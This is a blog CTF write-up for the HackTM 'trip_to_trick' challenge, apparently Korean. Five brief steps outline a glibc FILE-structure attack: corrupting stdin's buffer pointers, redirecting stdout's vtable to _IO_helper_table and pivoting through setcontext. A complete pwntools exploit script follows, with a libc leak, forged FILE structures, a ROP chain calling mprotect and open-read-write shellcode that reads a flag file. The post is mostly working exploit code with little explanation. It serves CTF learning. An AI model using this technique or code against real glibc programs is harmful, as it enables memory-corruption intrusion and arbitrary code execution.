Profile

youngsouk

youngsouk

[hacktmctf] trip_to_trick

1. stdin._IO_buf_base -> stdin

2. stdin._IO_buf_base = stdout, stdin._IO_buf_end = stdout +0x2000

3. stdout.vtable = _IO_helper_table

4. _IO_helper_table.sysclose = setcontext + 53

5. rop + orw

 

import sys
from pwn import *
if len(sys.argv) != 2:
print "sys.argv[1] = r : remote l : local"
exit()
#context.log_level = 'debug'
if sys.argv[1].strip() == 'l':
p = process('./trip_to_trick')
elif sys.argv[1].strip() == 'r':
p = remote('',)
e = ELF('./trip_to_trick')
if sys.argv[1].strip() == 'l':
l = e.libc
elif sys.argv[1].strip() == 'r':
l = ELF('./')
pause()
p.recvuntil("0x")
libc = int(p.recv(12), 16) - l.sym['system']
log.info("libc : " + hex(libc))
prdi = libc + 0x0000000000026542
prsi = libc + 0x0000000000026f9e
prdx = libc + 0x000000000012bda6
stdin = libc + l.sym['_IO_2_1_stdin_']
stdout = libc + l.sym['_IO_2_1_stdout_']
helper = libc + 0x1e5960
log.info("stdout : " + hex(stdout))
pay = hex(stdin + 0x38)[2:] + " " + hex(stdin)[2:]
p.sendline(pay) # _IO_2_1_stdin_ -> _IO_buf_base = _IO_2_1_stdin_
pay = p64(0xfbad208b)
pay += p64(stdout + 0xd8)
pay += p64(stdout) * 6
pay += p64(stdout + 0x2000)
p.send(pay)
pay = p64(0xfbad2887) #stdout
pay += p64(0x00007f21110c47e3 - 0x00007f2110edf000 + libc) * 7
pay += p64(0x00007f21110c47e4 - 0x00007f2110edf000 + libc)
pay += p64(0) * 4
pay += p64(0x00007f21110c3a00 - 0x00007f2110edf000 + libc)
pay += p64(1)
pay += p64(0xffffffffffffffff)
pay += p64(0)
pay += p64(0x00007f21110c6580 - 0x00007f2110edf000 + libc)
pay += p64(0xffffffffffffffff)
pay += p64(0)
pay += p64(0x00007f21110c38c0 - 0x00007f2110edf000 + libc)
pay += p64(0) * 3
pay += p64(0x00000000ffffffff)
pay += p64(0) * 2
pay += p64(helper) #stdout end
log.info("HELPER : " + hex(helper))
pay += p64(libc + l.sym['_IO_2_1_stderr_'])
pay += p64(stdout)
pay += p64(stdin)
#pay += p64(0x00007f92dbab0e90 - 0x7f92dba8a000 + libc)
# rop payload
rop = p64(prdi)
rop += p64(helper &~0xfff)
rop += p64(prsi)
rop += p64(0x3000)
rop += p64(prdx)
rop += p64(7)
rop += p64(libc + l.sym['mprotect'])
# shellcode
context(arch = "amd64", os = "linux")
orw = shellcraft.pushstr("/root/pwn/flag")
orw += shellcraft.open('rsp', 0, 0)
orw += shellcraft.read('rax', 'rsp', 0x100)
orw += shellcraft.write(1, 'rsp', 0x100)
orw = asm(orw).center(0x50, '\x90')
pay += orw.ljust(0x108, '\x90')
pay += p64(libc + l.sym['setcontext'] + 53) * 20
pay += p64(stdout + len(pay))
pay += rop
pay += p64(libc + 0x1e5858)
p.send(pay)
p.interactive()

'CTF write-up' 카테고리의 다른 글

[TRUST-CTF 2020] Fast Restaurant 출제자 writeup  (0) 2020.02.25
[Hitcon 2016] Secret Holder  (0) 2020.01.25
[wargame.0x0.site] babyheap 라이트업  (0) 2019.10.12
Tokyo Western CTF 2017 - Parrot  (0) 2019.10.02
[hackingcamp2019]bonus  (0) 2019.08.25